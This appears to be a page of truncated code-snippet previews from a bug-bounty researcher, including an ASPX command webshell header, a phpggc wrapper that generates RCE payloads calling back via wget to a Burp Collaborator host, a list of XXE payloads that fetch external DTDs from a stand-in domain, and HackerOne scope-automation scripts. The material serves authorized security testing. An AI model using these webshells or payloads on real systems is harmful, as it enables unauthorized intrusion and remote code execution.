honoki

# see https://espanso.org/ for more info
matches:
  # base64 encode whatever's on your clipboard
  - trigger: ":be"
    replace: "{{output}}"
    vars:
      - name: "clipb"
        type: "clipboard"
      - name: output
        type: shell

honoki

Keybase proof

I hereby claim:

• I am honoki on github.
• I am honoki (https://keybase.io/honoki) on keybase.
• I have a public key ASAeJaTSXX2WEDxNZf5QSkh-Rg_hl16ncJgcuW14Aba7Two

To claim this, I am signing this object:

honoki

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>

<!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx -->

<%

Response.Write("Executing code.")

honoki

#!/bin/bash

# Update the scope of your HackerOne programs

h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'

for p in $(bbrf programs where platform is hackerone --show-empty-scope); do
  h1id=$(bbrf show $p | jq -r .tags.h1id)

honoki

#!/bin/bash

# Initiate new BBRF programs from your public and private HackerOne programs

h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'

while [ "$next" ]; do

honoki

#!/bin/bash

# phpggc wrapper that automatically generates payloads for RCE gadgets

function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"

# generate gadget chains

honoki

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

honoki

#!/usr/bin/python3
import requests

def is_blacklisted(domain):
    blacklist  = open("/path/to/blacklist.txt")
    return domain in [w.strip() for w in blacklist.readlines()]

def request(flow):
    req = flow.request.method + ' ' + flow.request.path + ' ' + flow.request.http_version + '\n'

honoki

import time
import requests

def is_blacklisted(domain):
    blacklist  = open("blacklist.txt")
    return domain in [w.strip() for w in blacklist.readlines()]

# Avoid Slack expanding your links by replacing the last dot.
def escape_domain(domain):
    return domain.replace('yourdomain.com', 'yourdomain[.]com')